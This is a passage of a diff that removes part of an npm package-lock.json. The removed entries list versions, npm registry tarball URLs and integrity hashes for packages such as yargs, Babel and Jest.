"peerDependenciesMeta": { - "bufferutil": { - "optional": true - }, - "utf-8-validate": { - "optional": true - } - } - }, - "node_modules/y18n": { - "version": "5.0.8", - "resolved": "https://registry.npmjs.org/y18n/-/y18n-5.0.8.tgz", - "integrity": "sha512-0pfFzegeDWJHJIAmTLRP2DwHjdF5s7jo9tuztdQxAhINCdvS+3nGINqPd00AphqJR/0LhANUS6/+7SCb98YOfA==", - "dev": true, - "engines": { - "node": ">=10" - } - }, - "node_modules/yallist": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", - "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==" - }, - "node_modules/yargs": { - "version": "17.6.2", - "resolved": "https://registry.npmjs.org/yargs/-/yargs-17.6.2.tgz", - "integrity": "sha512-1/9UrdHjDZc0eOU0HxOHoS78C69UD3JRMvzlJ7S79S2nTaWRA/whGCTV8o9e/N/1Va9YIV7Q4sOxD8VV4pCWOw==", - "dev": true, - "dependencies": { - "cliui": "^8.0.1", - "escalade": "^3.1.1", - "get-caller-file": "^2.0.5", - "require-directory": "^2.1.1", - "string-width": "^4.2.3", - "y18n": "^5.0.5", - "yargs-parser": "^21.1.1" - }, - "engines": { - "node": ">=12" - } - }, - "node_modules/yargs-parser": { - "version": "21.1.1", - "resolved": "https://registry.npmjs.org/yargs-parser/-/yargs-parser-21.1.1.tgz", - "integrity": "sha512-tVpsJW7DdjecAiFpbIB1e3qxIQsE6NoPc5/eTdrbbIC4h0LVsWhnoa3g+m2HclBIujHzsxZ4VJVA+GUuc2/LBw==", - "dev": true, - "engines": { - "node": ">=12" - } - }, - "node_modules/yocto-queue": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/yocto-queue/-/yocto-queue-0.1.0.tgz", - "integrity": "sha512-rVksvsnNCdJ/ohGc6xgPwyN8eheCxsiLM8mxuE/t/mOVqJewPuO1miLpTHQiRgTKCLexL4MeAFVagts7HmNZ2Q==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - } - }, - "dependencies": { - "@babel/code-frame": { - "version": "7.22.13", - "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.22.13.tgz", - "integrity": "sha512-XktuhWlJ5g+3TJXc5upd9Ks1HutSArik6jf2eAjYFyIOf4ej3RN+184cZbzDvbPnuTJIUhPKKJE3cIsYTiAT3w==", - "dev": true, - "requires": { - "@babel/highlight": "^7.22.13", - "chalk": "^2.4.2" - }, - "dependencies": { - "ansi-styles": { - "version": "3.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-3.2.1.tgz", - "integrity": "sha512-VT0ZI6kZRdTh8YyJw3SMbYm/u+NqfsAxEpWO0Pf9sq8/e94WxxOpPKx9FR1FlyCtOVDNOQ+8ntlqFxiRc+r5qA==", - "dev": true, - "requires": { - "color-convert": "^1.9.0" - } - }, - "chalk": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-2.4.2.tgz", - "integrity": "sha512-Mti+f9lpJNcwF4tWV8/OrTTtF1gZi+f8FqlyAdouralcFWFQWF2+NgCHShjkCb+IFBLq9buZwE1xckQU4peSuQ==", - "dev": true, - "requires": { - "ansi-styles": "^3.2.1", - "escape-string-regexp": "^1.0.5", - "supports-color": "^5.3.0" - } - }, - "color-convert": { - "version": "1.9.3", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-1.9.3.tgz", - "integrity": "sha512-QfAUtd+vFdAtFQcC8CCyYt1fYWxSqAiK2cSD6zDB8N3cpsEBAvRxp9zOGg6G/SHHJYAT88/az/IuDGALsNVbGg==", - "dev": true, - "requires": { - "color-name": "1.1.3" - } - }, - "color-name": { - "version": "1.1.3", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.3.tgz", - "integrity": "sha512-72fSenhMw2HZMTVHeCA9KCmpEIbzWiQsjN+BHcBbS9vr1mtt+vJjPdksIBNUmKAW8TFUDPJK5SUU3QhE9NEXDw==", - "dev": true - }, - "escape-string-regexp": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-1.0.5.tgz", - "integrity": "sha512-vbRorB5FUQWvla16U8R/qgaFIya2qGzwDrNmCZuYKrbdSUMG6I1ZCGQRefkRVhuOkIGVne7BQ35DSfo1qvJqFg==", - "dev": true - }, - "has-flag": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-3.0.0.tgz", - "integrity": "sha512-sKJf1+ceQBr4SMkvQnBDNDtf4TXpVhVGateu0t918bl30FnbE2m4vNLX+VWe/dpjlb+HugGYzW7uQXH98HPEYw==", - "dev": true - }, - "supports-color": { - "version": "5.5.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-5.5.0.tgz", - "integrity": "sha512-QjVjwdXIt408MIiAqCX4oUKsgU2EqAGzs2Ppkm4aQYbjm+ZEWEcW4SfFNTr4uMNZma0ey4f5lgLrkB0aX0QMow==", - "dev": true, - "requires": { - "has-flag": "^3.0.0" - } - } - } - }, - "@babel/compat-data": { - "version": "7.15.0", - "resolved": "https://registry.npmjs.org/@babel/compat-data/-/compat-data-7.15.0.tgz", - "integrity": "sha512-0NqAC1IJE0S0+lL1SWFMxMkz1pKCNCjI4tr2Zx4LJSXxCLAdr6KyArnY+sno5m3yH9g737ygOyPABDsnXkpxiA==", - "dev": true - }, - "@babel/core": { - "version": "7.15.0", - "resolved": "https://registry.npmjs.org/@babel/core/-/core-7.15.0.tgz", - "integrity": "sha512-tXtmTminrze5HEUPn/a0JtOzzfp0nk+UEXQ/tqIJo3WDGypl/2OFQEMll/zSFU8f/lfmfLXvTaORHF3cfXIQMw==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.14.5", - "@babel/generator": "^7.15.0", - "@babel/helper-compilation-targets": "^7.15.0", - "@babel/helper-module-transforms": "^7.15.0", - "@babel/helpers": "^7.14.8", - "@babel/parser": "^7.15.0", - "@babel/template": "^7.14.5", - "@babel/traverse": "^7.15.0", - "@babel/types": "^7.15.0", - "convert-source-map": "^1.7.0", - "debug": "^4.1.0", - "gensync": "^1.0.0-beta.2", - "json5": "^2.1.2", - "semver": "^6.3.0", - "source-map": "^0.5.0" - }, - "dependencies": { - "source-map": { - "version": "0.5.7", - "resolved": "https://registry.npmjs.org/source-map/-/source-map-0.5.7.tgz", - "integrity": "sha1-igOdLRAh0i0eoUyA2OpGi6LvP8w=", - "dev": true - } - } - }, - "@babel/generator": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/generator/-/generator-7.23.0.tgz", - "integrity": "sha512-lN85QRR+5IbYrMWM6Y4pE/noaQtg4pNiqeNGX60eqOfo6gtEj6uw/JagelB8vVztSd7R6M5n1+PQkDbHbBRU4g==", - "dev": true, - "requires": { - "@babel/types": "^7.23.0", - "@jridgewell/gen-mapping": "^0.3.2", - "@jridgewell/trace-mapping": "^0.3.17", - "jsesc": "^2.5.1" - } - }, - "@babel/helper-compilation-targets": { - "version": "7.15.0", - "resolved": "https://registry.npmjs.org/@babel/helper-compilation-targets/-/helper-compilation-targets-7.15.0.tgz", - "integrity": "sha512-h+/9t0ncd4jfZ8wsdAsoIxSa61qhBYlycXiHWqJaQBCXAhDCMbPRSMTGnZIkkmt1u4ag+UQmuqcILwqKzZ4N2A==", - "dev": true, - "requires": { - "@babel/compat-data": "^7.15.0", - "@babel/helper-validator-option": "^7.14.5", - "browserslist": "^4.16.6", - "semver": "^6.3.0" - } - }, - "@babel/helper-environment-visitor": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/helper-environment-visitor/-/helper-environment-visitor-7.22.20.tgz", - "integrity": "sha512-zfedSIzFhat/gFhWfHtgWvlec0nqB9YEIVrpuwjruLlXfUSnA8cJB0miHKwqDnQ7d32aKo2xt88/xZptwxbfhA==", - "dev": true - }, - "@babel/helper-function-name": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/helper-function-name/-/helper-function-name-7.23.0.tgz", - "integrity": "sha512-OErEqsrxjZTJciZ4Oo+eoZqeW9UIiOcuYKRJA4ZAgV9myA+pOXhhmpfNCKjEH/auVfEYVFJ6y1Tc4r0eIApqiw==", - "dev": true, - "requires": { - "@babel/template": "^7.22.15", - "@babel/types": "^7.23.0" - } - }, - "@babel/helper-hoist-variables": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-hoist-variables/-/helper-hoist-variables-7.22.5.tgz", - "integrity": "sha512-wGjk9QZVzvknA6yKIUURb8zY3grXCcOZt+/7Wcy8O2uctxhplmUPkOdlgoNhmdVee2c92JXbf1xpMtVNbfoxRw==", - "dev": true, - "requires": { - "@babel/types": "^7.22.5" - } - }, - "@babel/helper-member-expression-to-functions": { - "version": "7.15.0", - "resolved": "https://registry.npmjs.org/@babel/helper-member-expression-to-functions/-/helper-member-expression-to-functions-7.15.0.tgz", - "integrity": "sha512-Jq8H8U2kYiafuj2xMTPQwkTBnEEdGKpT35lJEQsRRjnG0LW3neucsaMWLgKcwu3OHKNeYugfw+Z20BXBSEs2Lg==", - "dev": true, - "requires": { - "@babel/types": "^7.15.0" - } - }, - "@babel/helper-module-imports": { - "version": "7.14.5", - "resolved": "https://registry.npmjs.org/@babel/helper-module-imports/-/helper-module-imports-7.14.5.tgz", - "integrity": "sha512-SwrNHu5QWS84XlHwGYPDtCxcA0hrSlL2yhWYLgeOc0w7ccOl2qv4s/nARI0aYZW+bSwAL5CukeXA47B/1NKcnQ==", - "dev": true, - "requires": { - "@babel/types": "^7.14.5" - } - }, - "@babel/helper-module-transforms": { - "version": "7.15.0", - "resolved": "https://registry.npmjs.org/@babel/helper-module-transforms/-/helper-module-transforms-7.15.0.tgz", - "integrity": "sha512-RkGiW5Rer7fpXv9m1B3iHIFDZdItnO2/BLfWVW/9q7+KqQSDY5kUfQEbzdXM1MVhJGcugKV7kRrNVzNxmk7NBg==", - "dev": true, - "requires": { - "@babel/helper-module-imports": "^7.14.5", - "@babel/helper-replace-supers": "^7.15.0", - "@babel/helper-simple-access": "^7.14.8", - "@babel/helper-split-export-declaration": "^7.14.5", - "@babel/helper-validator-identifier": "^7.14.9", - "@babel/template": "^7.14.5", - "@babel/traverse": "^7.15.0", - "@babel/types": "^7.15.0" - } - }, - "@babel/helper-optimise-call-expression": { - "version": "7.14.5", - "resolved": "https://registry.npmjs.org/@babel/helper-optimise-call-expression/-/helper-optimise-call-expression-7.14.5.tgz", - "integrity": "sha512-IqiLIrODUOdnPU9/F8ib1Fx2ohlgDhxnIDU7OEVi+kAbEZcyiF7BLU8W6PfvPi9LzztjS7kcbzbmL7oG8kD6VA==", - "dev": true, - "requires": { - "@babel/types": "^7.14.5" - } - }, - "@babel/helper-plugin-utils": { - "version": "7.20.2", - "resolved": "https://registry.npmjs.org/@babel/helper-plugin-utils/-/helper-plugin-utils-7.20.2.tgz", - "integrity": "sha512-8RvlJG2mj4huQ4pZ+rU9lqKi9ZKiRmuvGuM2HlWmkmgOhbs6zEAw6IEiJ5cQqGbDzGZOhwuOQNtZMi/ENLjZoQ==", - "dev": true - }, - "@babel/helper-replace-supers": { - "version": "7.15.0", - "resolved": "https://registry.npmjs.org/@babel/helper-replace-supers/-/helper-replace-supers-7.15.0.tgz", - "integrity": "sha512-6O+eWrhx+HEra/uJnifCwhwMd6Bp5+ZfZeJwbqUTuqkhIT6YcRhiZCOOFChRypOIe0cV46kFrRBlm+t5vHCEaA==", - "dev": true, - "requires": { - "@babel/helper-member-expression-to-functions": "^7.15.0", - "@babel/helper-optimise-call-expression": "^7.14.5", - "@babel/traverse": "^7.15.0", - "@babel/types": "^7.15.0" - } - }, - "@babel/helper-simple-access": { - "version": "7.14.8", - "resolved": "https://registry.npmjs.org/@babel/helper-simple-access/-/helper-simple-access-7.14.8.tgz", - "integrity": "sha512-TrFN4RHh9gnWEU+s7JloIho2T76GPwRHhdzOWLqTrMnlas8T9O7ec+oEDNsRXndOmru9ymH9DFrEOxpzPoSbdg==", - "dev": true, - "requires": { - "@babel/types": "^7.14.8" - } - }, - "@babel/helper-split-export-declaration": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/helper-split-export-declaration/-/helper-split-export-declaration-7.22.6.tgz", - "integrity": "sha512-AsUnxuLhRYsisFiaJwvp1QF+I3KjD5FOxut14q/GzovUe6orHLesW2C7d754kRm53h5gqrz6sFl6sxc4BVtE/g==", - "dev": true, - "requires": { - "@babel/types": "^7.22.5" - } - }, - "@babel/helper-string-parser": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-string-parser/-/helper-string-parser-7.22.5.tgz", - "integrity": "sha512-mM4COjgZox8U+JcXQwPijIZLElkgEpO5rsERVDJTc2qfCDfERyob6k5WegS14SX18IIjv+XD+GrqNumY5JRCDw==", - "dev": true - }, - "@babel/helper-validator-identifier": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-identifier/-/helper-validator-identifier-7.22.20.tgz", - "integrity": "sha512-Y4OZ+ytlatR8AI+8KZfKuL5urKp7qey08ha31L8b3BwewJAoJamTzyvxPR/5D+KkdJCGPq/+8TukHBlY10FX9A==", - "dev": true - }, - "@babel/helper-validator-option": { - "version": "7.14.5", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-option/-/helper-validator-option-7.14.5.tgz", - "integrity": "sha512-OX8D5eeX4XwcroVW45NMvoYaIuFI+GQpA2a8Gi+X/U/cDUIRsV37qQfF905F0htTRCREQIB4KqPeaveRJUl3Ow==", - "dev": true - }, - "@babel/helpers": { - "version": "7.15.3", - "resolved": "https://registry.npmjs.org/@babel/helpers/-/helpers-7.15.3.tgz", - "integrity": "sha512-HwJiz52XaS96lX+28Tnbu31VeFSQJGOeKHJeaEPQlTl7PnlhFElWPj8tUXtqFIzeN86XxXoBr+WFAyK2PPVz6g==", - "dev": true, - "requires": { - "@babel/template": "^7.14.5", - "@babel/traverse": "^7.15.0", - "@babel/types": "^7.15.0" - } - }, - "@babel/highlight": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/highlight/-/highlight-7.22.20.tgz", - "integrity": "sha512-dkdMCN3py0+ksCgYmGG8jKeGA/8Tk+gJwSYYlFGxG5lmhfKNoAy004YpLxpS1W2J8m/EK2Ew+yOs9pVRwO89mg==", - "dev": true, - "requires": { - "@babel/helper-validator-identifier": "^7.22.20", - "chalk": "^2.4.2", - "js-tokens": "^4.0.0" - }, - "dependencies": { - "ansi-styles": { - "version": "3.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-3.2.1.tgz", - "integrity": "sha512-VT0ZI6kZRdTh8YyJw3SMbYm/u+NqfsAxEpWO0Pf9sq8/e94WxxOpPKx9FR1FlyCtOVDNOQ+8ntlqFxiRc+r5qA==", - "dev": true, - "requires": { - "color-convert": "^1.9.0" - } - }, - "chalk": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-2.4.2.tgz", - "integrity": "sha512-Mti+f9lpJNcwF4tWV8/OrTTtF1gZi+f8FqlyAdouralcFWFQWF2+NgCHShjkCb+IFBLq9buZwE1xckQU4peSuQ==", - "dev": true, - "requires": { - "ansi-styles": "^3.2.1", - "escape-string-regexp": "^1.0.5", - "supports-color": "^5.3.0" - } - }, - "color-convert": { - "version": "1.9.3", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-1.9.3.tgz", - "integrity": "sha512-QfAUtd+vFdAtFQcC8CCyYt1fYWxSqAiK2cSD6zDB8N3cpsEBAvRxp9zOGg6G/SHHJYAT88/az/IuDGALsNVbGg==", - "dev": true, - "requires": { - "color-name": "1.1.3" - } - }, - "color-name": { - "version": "1.1.3", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.3.tgz", - "integrity": "sha512-72fSenhMw2HZMTVHeCA9KCmpEIbzWiQsjN+BHcBbS9vr1mtt+vJjPdksIBNUmKAW8TFUDPJK5SUU3QhE9NEXDw==", - "dev": true - }, - "escape-string-regexp": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-1.0.5.tgz", - "integrity": "sha512-vbRorB5FUQWvla16U8R/qgaFIya2qGzwDrNmCZuYKrbdSUMG6I1ZCGQRefkRVhuOkIGVne7BQ35DSfo1qvJqFg==", - "dev": true - }, - "has-flag": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-3.0.0.tgz", - "integrity": "sha512-sKJf1+ceQBr4SMkvQnBDNDtf4TXpVhVGateu0t918bl30FnbE2m4vNLX+VWe/dpjlb+HugGYzW7uQXH98HPEYw==", - "dev": true - }, - "supports-color": { - "version": "5.5.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-5.5.0.tgz", - "integrity": "sha512-QjVjwdXIt408MIiAqCX4oUKsgU2EqAGzs2Ppkm4aQYbjm+ZEWEcW4SfFNTr4uMNZma0ey4f5lgLrkB0aX0QMow==", - "dev": true, - "requires": { - "has-flag": "^3.0.0" - } - } - } - }, - "@babel/parser": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/parser/-/parser-7.23.0.tgz", - "integrity": "sha512-vvPKKdMemU85V9WE/l5wZEmImpCtLqbnTvqDS2U1fJ96KrxoW7KrXhNsNCblQlg8Ck4b85yxdTyelsMUgFUXiw==", - "dev": true - }, - "@babel/plugin-syntax-async-generators": { - "version": "7.8.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-async-generators/-/plugin-syntax-async-generators-7.8.4.tgz", - "integrity": "sha512-tycmZxkGfZaxhMRbXlPXuVFpdWlXpir2W4AMhSJgRKzk/eDlIXOhb2LHWoLpDF7TEHylV5zNhykX6KAgHJmTNw==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-bigint": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-bigint/-/plugin-syntax-bigint-7.8.3.tgz", - "integrity": "sha512-wnTnFlG+YxQm3vDxpGE57Pj0srRU4sHE/mDkt1qv2YJJSeUAec2ma4WLUnUPeKjyrfntVwe/N6dCXpU+zL3Npg==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-class-properties": { - "version": "7.12.13", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-class-properties/-/plugin-syntax-class-properties-7.12.13.tgz", - "integrity": "sha512-fm4idjKla0YahUNgFNLCB0qySdsoPiZP3iQE3rky0mBUtMZ23yDJ9SJdg6dXTSDnulOVqiF3Hgr9nbXvXTQZYA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.12.13" - } - }, - "@babel/plugin-syntax-import-meta": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-import-meta/-/plugin-syntax-import-meta-7.10.4.tgz", - "integrity": "sha512-Yqfm+XDx0+Prh3VSeEQCPU81yC+JWZ2pDPFSS4ZdpfZhp4MkFMaDC1UqseovEKwSUpnIL7+vK+Clp7bfh0iD7g==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.10.4" - } - }, - "@babel/plugin-syntax-json-strings": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-json-strings/-/plugin-syntax-json-strings-7.8.3.tgz", - "integrity": "sha512-lY6kdGpWHvjoe2vk4WrAapEuBR69EMxZl+RoGRhrFGNYVK8mOPAW8VfbT/ZgrFbXlDNiiaxQnAtgVCZ6jv30EA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-jsx": { - "version": "7.18.6", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-jsx/-/plugin-syntax-jsx-7.18.6.tgz", - "integrity": "sha512-6mmljtAedFGTWu2p/8WIORGwy+61PLgOMPOdazc7YoJ9ZCWUyFy3A6CpPkRKLKD1ToAesxX8KGEViAiLo9N+7Q==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.18.6" - } - }, - "@babel/plugin-syntax-logical-assignment-operators": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-logical-assignment-operators/-/plugin-syntax-logical-assignment-operators-7.10.4.tgz", - "integrity": "sha512-d8waShlpFDinQ5MtvGU9xDAOzKH47+FFoney2baFIoMr952hKOLp1HR7VszoZvOsV/4+RRszNY7D17ba0te0ig==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.10.4" - } - }, - "@babel/plugin-syntax-nullish-coalescing-operator": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-nullish-coalescing-operator/-/plugin-syntax-nullish-coalescing-operator-7.8.3.tgz", - "integrity": "sha512-aSff4zPII1u2QD7y+F8oDsz19ew4IGEJg9SVW+bqwpwtfFleiQDMdzA/R+UlWDzfnHFCxxleFT0PMIrR36XLNQ==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-numeric-separator": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-numeric-separator/-/plugin-syntax-numeric-separator-7.10.4.tgz", - "integrity": "sha512-9H6YdfkcK/uOnY/K7/aA2xpzaAgkQn37yzWUMRK7OaPOqOpGS1+n0H5hxT9AUw9EsSjPW8SVyMJwYRtWs3X3ug==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.10.4" - } - }, - "@babel/plugin-syntax-object-rest-spread": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-object-rest-spread/-/plugin-syntax-object-rest-spread-7.8.3.tgz", - "integrity": "sha512-XoqMijGZb9y3y2XskN+P1wUGiVwWZ5JmoDRwx5+3GmEplNyVM2s2Dg8ILFQm8rWM48orGy5YpI5Bl8U1y7ydlA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-optional-catch-binding": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-catch-binding/-/plugin-syntax-optional-catch-binding-7.8.3.tgz", - "integrity": "sha512-6VPD0Pc1lpTqw0aKoeRTMiB+kWhAoT24PA+ksWSBrFtl5SIRVpZlwN3NNPQjehA2E/91FV3RjLWoVTglWcSV3Q==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-optional-chaining": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-chaining/-/plugin-syntax-optional-chaining-7.8.3.tgz", - "integrity": "sha512-KoK9ErH1MBlCPxV0VANkXW2/dw4vlbGDrFgz8bmUsBGYkFRcbRwMh6cIJubdPrkxRwuGdtCk0v/wPTKbQgBjkg==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-top-level-await": { - "version": "7.14.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-top-level-await/-/plugin-syntax-top-level-await-7.14.5.tgz", - "integrity": "sha512-hx++upLv5U1rgYfwe1xBQUhRmU41NEvpUvrp8jkrSCdvGSnM5/qdRMtylJ6PG5OFkBaHkbTAKTnd3/YyESRHFw==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.14.5" - } - }, - "@babel/plugin-syntax-typescript": { - "version": "7.20.0", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-typescript/-/plugin-syntax-typescript-7.20.0.tgz", - "integrity": "sha512-rd9TkG+u1CExzS4SM1BlMEhMXwFLKVjOAFFCDx9PbX5ycJWDoWMcwdJH9RhkPu1dOgn5TrxLot/Gx6lWFuAUNQ==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.19.0" - } - }, - "@babel/template": { - "version": "7.22.15", - "resolved": "https://registry.npmjs.org/@babel/template/-/template-7.22.15.tgz", - "integrity": "sha512-QPErUVm4uyJa60rkI73qneDacvdvzxshT3kksGqlGWYdOTIUOwJ7RDUL8sGqslY1uXWSL6xMFKEXDS3ox2uF0w==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.22.13", - "@babel/parser": "^7.22.15", - "@babel/types": "^7.22.15" - } - }, - "@babel/traverse": { - "version": "7.23.2", - "resolved": "https://registry.npmjs.org/@babel/traverse/-/traverse-7.23.2.tgz", - "integrity": "sha512-azpe59SQ48qG6nu2CzcMLbxUudtN+dOM9kDbUqGq3HXUJRlo7i8fvPoxQUzYgLZ4cMVmuZgm8vvBpNeRhd6XSw==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.22.13", - "@babel/generator": "^7.23.0", - "@babel/helper-environment-visitor": "^7.22.20", - "@babel/helper-function-name": "^7.23.0", - "@babel/helper-hoist-variables": "^7.22.5", - "@babel/helper-split-export-declaration": "^7.22.6", - "@babel/parser": "^7.23.0", - "@babel/types": "^7.23.0", - "debug": "^4.1.0", - "globals": "^11.1.0" - } - }, - "@babel/types": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/types/-/types-7.23.0.tgz", - "integrity": "sha512-0oIyUfKoI3mSqMvsxBdclDwxXKXAUA8v/apZbc+iSyARYou1o8ZGDxbUYyLFoW2arqS2jDGqJuZvv1d/io1axg==", - "dev": true, - "requires": { - "@babel/helper-string-parser": "^7.22.5", - "@babel/helper-validator-identifier": "^7.22.20", - "to-fast-properties": "^2.0.0" - } - }, - "@bcoe/v8-coverage": { - "version": "0.2.3", - "resolved": "https://registry.npmjs.org/@bcoe/v8-coverage/-/v8-coverage-0.2.3.tgz", - "integrity": "sha512-0hYQ8SB4Db5zvZB4axdMHGwEaQjkZzFjQiN9LVYvIFB2nSUHW9tYpxWriPrWDASIxiaXax83REcLxuSdnGPZtw==", - "dev": true - }, - "@istanbuljs/load-nyc-config": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/@istanbuljs/load-nyc-config/-/load-nyc-config-1.1.0.tgz", - "integrity": "sha512-VjeHSlIzpv/NyD3N0YuHfXOPDIixcA1q2ZV98wsMqcYlPmv2n3Yb2lYP9XMElnaFVXg5A7YLTeLu6V84uQDjmQ==", - "dev": true, - "requires": { - "camelcase": "^5.3.1", - "find-up": "^4.1.0", - "get-package-type": "^0.1.0", - "js-yaml": "^3.13.1", - "resolve-from": "^5.0.0" - }, - "dependencies": { - "argparse": { - "version": "1.0.10", - "resolved": "https://registry.npmjs.org/argparse/-/argparse-1.0.10.tgz", - "integrity": "sha512-o5Roy6tNG4SL/FOkCAN6RzjiakZS25RLYFrcMttJqbdd8BWrnA+fGz57iN5Pb06pvBGvl5gQ0B48dJlslXvoTg==", - "dev": true, - "requires": { - "sprintf-js": "~1.0.2" - } - }, - "js-yaml": { - "version": "3.14.1", - "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-3.14.1.tgz", - "integrity": "sha512-okMH7OXXJ7YrN9Ok3/SXrnu4iX9yOk+25nqX4imS2npuvTYDmo/QEZoqwZkYaIDk3jVvBOTOIEgEhaLOynBS9g==", - "dev": true, - "requires": { - "argparse": "^1.0.7", - "esprima": "^4.0.0" - } - } - } - }, - "@istanbuljs/schema": { - "version": "0.1.3", - "resolved": "https://registry.npmjs.org/@istanbuljs/schema/-/schema-0.1.3.tgz", - "integrity": "sha512-ZXRY4jNvVgSVQ8DL3LTcakaAtXwTVUxE81hslsyD2AtoXW/wVob10HkOJ1X/pAlcI7D+2YoZKg5do8G/w6RYgA==", - "dev": true - }, - "@jest/console": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/console/-/console-29.4.1.tgz", - "integrity": "sha512-m+XpwKSi3PPM9znm5NGS8bBReeAJJpSkL1OuFCqaMaJL2YX9YXLkkI+MBchMPwu+ZuM2rynL51sgfkQteQ1CKQ==", - "dev": true, - "requires": { - "@jest/types": "^29.4.1", - "@types/node": "*", - "chalk": "^4.0.0", - "jest-message-util": "^29.4.1", - "jest-util": "^29.4.1", - "slash": "^3.0.0" - } - }, - "@jest/core": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/core/-/core-29.4.1.tgz", - "integrity": "sha512-RXFTohpBqpaTebNdg5l3I5yadnKo9zLBajMT0I38D0tDhreVBYv3fA8kywthI00sWxPztWLD3yjiUkewwu/wKA==", - "dev": true, - "requires": { - "@jest/console": "^29.4.1", - "@jest/reporters": "^29.4.1", - "@jest/test-result": "^29.4.1", - "@jest/transform": "^29.4.1", - "@jest/types": "^29.4.1", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "jest-changed-files": "^29.4.0", - "jest-config": "^29.4.1", - "jest-haste-map": "^29.4.1", - "jest-message-util": "^29.4.1", - "jest-regex-util": "^29.2.0", - "jest-resolve": "^29.4.1", - "jest-resolve-dependencies": "^29.4.1", - "jest-runner": "^29.4.1", - "jest-runtime": "^29.4.1", - "jest-snapshot": "^29.4.1", - "jest-util": "^29.4.1", - "jest-validate": "^29.4.1", - "jest-watcher": "^29.4.1", - "micromatch": "^4.0.4", - "pretty-format": "^29.4.1", - "slash": "^3.0.0", - "strip-ansi": "^6.0.0" - }, - "dependencies": { - "@jest/transform": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/transform/-/transform-29.4.1.tgz", - "integrity": 